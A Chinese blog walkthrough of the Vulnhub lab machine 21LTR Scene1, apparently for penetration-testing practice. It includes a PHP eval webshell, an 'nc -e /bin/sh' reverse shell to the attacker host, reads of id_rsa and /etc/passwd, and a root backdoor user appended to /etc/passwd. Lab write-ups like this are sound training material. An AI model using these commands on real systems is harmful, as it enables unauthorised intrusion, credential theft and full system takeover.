Vulnhub靶机 21 LTR-Scene1(渗透测试详细)

已于 2024-07-31 08:46:04 修改
阅读量370 收藏 5
点赞数 4
文章标签: 网络 服务器 tcp/ip 运维 安全性测试
于 2024-07-30 22:28:26 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_78721909/article/details/140806889
版权

靶机下载地址

https://www.vulnhub.com/entry/21ltr-scene-1,3/

一、配置网卡

1、靶机网卡

靶机默认网卡为仅主机,192.168.2.120

2、kali网卡

建议配置一张仅主机网卡,并且修改为和靶机同一网段

二、web渗透测试

1、扫描靶机IP地址

nmap 192.168.2.0/24

2、扫描靶机的端口和服务版本

nmap -sV -O 192.168.2.120

3、访问靶机地址

已知端口80开发,直接访问

没啥可用点

4、对靶机进行目录扫描

dirsearch -u http://192.168.2.120

访问后没啥用

5、通过反复查找页面功能点

查看主页源码发现了一个账户密码

6、利用账户密码进行FTP和SSH连接

上面已经扫描出来21和22端口开发

经过测试,发现FTP可以成功连接

输入ls,查看有什么可用东西

7、尝试将扫描出来的文件下载到本地

get backup_log.php /home/kali/Desktop/shell.php

8、查看下载的shell.php

发现是个日志文件

之前目录扫描出来一个logs目录,尝试拼接这个文件访问

三、获取shell

1、写入webshell

已经知道backup_log.php文件可以解析,尝试写入一句话木马

这里利用10001端口写入,输入以下命令

1、telnet 192.168.2.120 10001
2、<?php eval($_POST[hack]);?>

2、写入完成后,重新访问网址backup_log.php文件

3、这里拼接?cmd=,输入id命令,发现是个任意代码执行漏洞

4、拼接参数值,写入反弹shell语句

nc -e /bin/sh 192.168.2.129 5555

kali监听,nc -lvvp 5555

成功反弹

四、提权

1、建立交互式shell
python -c 'import pty; pty.spawn("/bin/sh")'

输入以下命令

1、cd /media/USB_1/Stuff/Keys
2、ls
3、cat authorized_keys

2、查看密钥文件
cat id_rsa

3、查看/etc/passwd

cat /etc/passwd

发现存在hbeale用户

3、尝试用密钥文件登录
ssh -i id_rsa hbeale@192.168.2.120

成功连接,但是个低权限用户

4、利用不安全配置/etc/passwd可写进行提权

创建root新用户

利用openssl生成密码hash值

5、将hash密码添加到/etc/passwd

echo 'user1:$1$dY7ecSy3$DuiqIJfj/66qr4GMayq1O/:0:0:root:/root:/bin/bash' >> /etc/passwd

6、切换刚刚创建的用户

su user1

提权成功!!!

芜丶湖
关注
  • 4
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Vulnhub靶机:DC-3渗透详细过程
IerkeU的博客
02-21 2498
前情提要 靶场地址:https://www.vulnhub.com/entry/dc-32,312/ DC-3是一个适合初学者的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具) 翻译一下官方给出的一些信息: 这个靶场与之前的不同,只有一个入口点和一个flag,并且没有任何线索。 靶场只需要简单的下载,解压,打开并将其导入到VMware即可(我将其网络配置为NAT模式,保证机器与kali在同一个网段下) nmap -sP 192.168.
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
VulnHub靶机 DC-5 打靶 渗透测试详细过程
rumil的博客
04-18 1121
在访问/footer.php,/thankyou.php时发现跳转界面和原始界面的年份不一样,总是来回变动,刷新也会变动。目录爆破发现,存在file参数,尝试读取一下/etc/passwd文件,成功读取/etc/passwd文件并回显成功。当然既然知道了包含/footer.php文件,那么我们也可以去猜解参数,常用的如file,尝试一下即可,或者爆破。暴露出如下几个目录,去访问发现其中的目录,爆出的目录其中有一些界面为默认界面当中点击跳转的目录。给予sh文件执行权限,直接执行一下试试,成功提权。
VulnHub靶机 DC-9 靶机 详细渗透过程
rumil的博客
04-27 1644
思路:主机发现—端口扫描—服务探测—指纹识别—Web渗透SQL注入—登入后台—文件包含—"敲门"打开22端口—SSH爆破—得到相关用户信息并远程登录—提权—分别搜寻三个用户下的目录文件—拿有价值信息进行查看—得到带有root权限的执行命令—分析并成功提权。ps:如果ssh不能登录,是因为22端口没有打开,流量过滤了,在前面信息收集当中发现22端口是关闭的。拿到的用户名和密码进行后台,登录进行,发现低端爆出文件未找到的信息,可能存在文件包含,根据提示尝试一下,成功读取/etc/passwd。
VulnHub靶机 DC-7 打靶 渗透详细流程
rumil的博客
04-22 1015
主机发现—端口扫描—目录爆破发现后台—服务探测—白盒测试(源码当中找配置文件)—ssh远程登录—邮件信息—找到备份文件脚本—发现脚本当中的drush命令—修改后台密码—进入后台—寻找可代码执行或getshell地方—drupal8不允许执行命令(模块)—下载新的插件—getshell—反弹shell—追加反弹命令—提权即可。由于我们上一步骤已经得到了backups.sh脚本属主为root,属组为www-data,所以我们将反弹shell命令添加到脚本当中,等待执行脚本反弹shell即可得到root权限。
Vulnhub靶机渗透测试——DC-1
Cobra的博客
04-12 2546
Vulnhub靶机渗透测试实战——DC-1 一、实验环境 攻击机(kali): 192.168.189.148 靶机(ubuntu): 192.168.189.172] 二、信息收集 1、使用nmap扫描进行主机发现 nmap 192.168.189.0/24 2、发现IP为192.168.189.172主机开放80和22等端口,访问其80端口 三、漏洞利用 1、发现该站点是由Drupal搭建,利用msf进行漏洞利用 use exploit/unix/webapp/drupal_drupalgedd
VulnHub靶机 DC-8 打靶实战 详细渗透过程
rumil的博客
04-24 1483
主机发现—端口扫描—服务探针—指纹识别—发现注入点—web渗透SQL注入—获取用户名密码—登入后台—发现可加载PHP代码输入PHP代码—反弹shell—提权—exim4漏洞利用。将其拷贝到本地,发现靶机有wget命令,那么可以通过wget进行下载,本地通过python开启一个http服务。访问web界面,通过上述信息收集加插件,得到以下信息,采用Drupal CMS,版本为Drupal 7。找到可代码执行的地方,或者可以输入代码的地方,尝试输入,保存即可。查看数据库当中的表信息,还有表中的内容。
[Vulnhub靶机] DC-1
haosha。的博客
05-07 4147
[Vulnhub靶机]DC-1靶机渗透思路及方法(个人分享)
Vulnhub靶机 DC-6 打靶实战 详细渗透测试过程
rumil的博客
04-20 1135
查看sudo -l 下的内容,发现有jens用户权限执行的脚本,正是刚才我们刚才看见的shell脚本,接下来可以利用此,来反弹jens用户权限的shell。当前目录下无可利用的文件信息,查看家目录,发现有四个用户信息,逐一查看,发现在jens家目录和mark家目录下有文件信息,逐一查看。mark家目录下有一个文件夹,文件夹当中为一个txt文本文件,查看后发现graham用户的信息,尝试ssh远程登录到graham。发现可以正常的命令回显,那么接下来直接进行反弹shell,kali端开启监听。
vulnhub靶机AI-Web-1.0渗透笔记
weixin_52125240的博客
07-14 1583
vulnhub靶机AI-Web-1.0渗透笔记
Vulnhub靶机渗透测试 Five-1靶机
12-07
Vulnhub靶机渗透测试 Five-1靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
网络第五章:多路转接
qincjun的博客
09-05 419
2.HTTP1.1采用了长连接的方式来进行通信:建立连接,服务器响应完之后,不断开连接,活跃的用户对服务器发送请求,服务器都会正常响应;对不活跃的用户,不进行任何操作;events是分配好的epoll_event结构体数组.epoll将会把发生的事件赋值到events数组中 (events不可以是空指针,内核只负责把数据复制到这个events数组中,不会去帮助我们在用户态中分配内存).epoll通过这些值的设定,来监视fd的行为,如果fd做了这些行为,则会通过epoll_wait来反馈给上层,进行处理。
观测云核心技术解密:eBPF Tracing 实现原理
观测云的博客
09-03 930
通过 eBPF,开发者可以在不修改内核源码的情况下,对内核功能进行扩展和监控。eBPF Tracing 利用这一技术,对系统调用、内核函数等进行跟踪,从而实现对应用行为的深入洞察。
计算机网络-VRRP工作原理
Linux基础知识、计算机网络基础学习分享。
09-03 657
初始化状态就是在设备上配置完成时的状态,Master状态为主设备的状态,Nackup状态为备份设备的状态,备份设备会监听主设备发送的Advertisement报文,当定时器超时都没有收到主设备的报文时则备份设备切换为Master状态。R1与R2交换VRRP报文,优先级一样,通过比较接口IP地址选举Master路由器,由于R2的接口IP地址大于R1的接口IP地址,因此R2被选举为Master路由器。进行比较,先比较优先级,优先级大的优先,优先级相等则比较接口IP地址,IP地址大的优先,
200 Gb/s和400 Gb/s网络
dncsk的专栏
09-07 1062
116.200 Gb/s和400 Gb/s网络简介写在前面 :1.需要英文原文请自行官网下载2.本人无授权故亦不接受相关付费服务 如有商业性需求建议寻找有资质的书籍供应商购买3.翻译纯粹为爱发电,因为机器翻译所以错乱较多 建议参照英文原文对比使用 4.欢迎评论区提出建议或意见 原则上不删除评论 原则上不回复私信 和解呈现200GBASE-RPCSPMDIEEEStd802.3-2022,IEEE以太网标准第八节116.200Gb/s和400Gb/s网络116.1概述116.1范围本条款描述了200千兆位和4
网络编程学习:TCP/IP协议
kkbbaaii的博客
09-01 1706
网络编程学习:TCP/IP协议
[网络]HTTP协议 Cookie与Session
最新发布
m0_74910646的博客
09-07 315
HTTP Cookie(也称为 Web Cookie、浏览器 Cookie 或简称 Cookie)是服务器发送到 用户浏览器并保存在浏览器上的一小块数据,它会在浏览器之后向同一服务器再次发 起请求时被携带并发送到服务器上。通常,它用于告知服务端两个请求是否来自同一浏览器,如保持用户的登录状态、记录用户偏好等。HTTP Session 是服务器用来跟踪用户与服务器交互期间用户状态的机制。由于 HTTP 协议是无状态的(每个请求都是独立的),因此服务器需要通过 Session 来记住用户的信息。
Vulnhub靶机渗透环境搭建及JIS-CTF入门实践
本文将详细讲解Vulnhub靶机渗透的环境搭建和JIS-CTF题目,采用Nmap、Dirb、中国蚁剑、敏感文件分析、SSH远程连接、Shell提权等获取5个flag。 一、Vulnhub简介 Vulnhub是一个开源的渗透测试平台,提供了多种类型的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值